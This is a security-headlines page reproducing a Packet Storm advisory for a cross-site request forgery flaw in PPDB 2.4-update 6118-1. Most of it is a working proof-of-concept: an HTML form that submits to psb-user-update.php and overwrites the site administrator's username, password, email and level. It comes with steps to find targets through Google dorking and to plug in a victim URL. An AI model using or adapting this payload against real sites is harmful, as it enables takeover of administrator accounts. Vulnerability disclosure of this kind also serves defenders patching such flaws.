Security
Headlines
HeadlinesLatestCVEs

Headline

PPDB 2.4-update 6118-1 Cross Site Request Forgery

PPDB version 2.4-update 6118-1 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#web#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : ppdb v2.4-update 6118-1 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0 |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 10. Set the target website link Save changes and apply .

[+] infected file : /root/psb-user-update.php.

[+] save code as poc.html

[+] payload :

<div class="col-lg-6">
<h2 class="page-header">Administrator</h2>
<div class="panel panel-default">
<div class="panel-heading">
User Profile
</div>
<!-- /.panel-heading -->
<div class="panel-body">
<div class="table-responsive">
<form role="form" method="post" action="http://127.0.0.1/ppdb/root/psb-user-update.php" enctype="multipart/form-data">
<table class="table table-striped table-bordered table-hover">

                                                                  <tbody>

                         <tr>    
                <td>Username</td>  
                <td><input class="form-control" type="text" name="username" value="indoushka" required="">  
                <input class="form-control" type="hidden" name="id" value="1"></td>  
                </tr>

                <tr>  
                <td>Password</td>  
                <td><input class="form-control" type="password" name="password" id="password" required=""></td>  
                </tr>  
                <tr>  
                <td>Nama</td>  
                <td><input class="form-control" type="nama" name="nama" id="nama" value="nekkaa salah eddine" required=""></td>  
                </tr>

                <tr>  
                <td>Email</td>  
                <td><input class="form-control" type="text" name="email" value="[email protected]" required="">  
                <input type="hidden" name="level" id="level" value="1">  
                </td>  
                </tr>  
                <tr>  

<td colspan="3"><input type="file" name="foto" id="foto" required=""></td>
</tr>

                                        </tbody>  
                            </table>  
                            <button type="submit" class="btn btn-primary" name="update" id="update">Update</button>  
                            </form>  
                        </div>  
                        <!-- /.table-responsive -->  
                    </div>  
                    <!-- /.panel-body -->  
                </div>  
                <!-- /.panel -->  
            </div>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution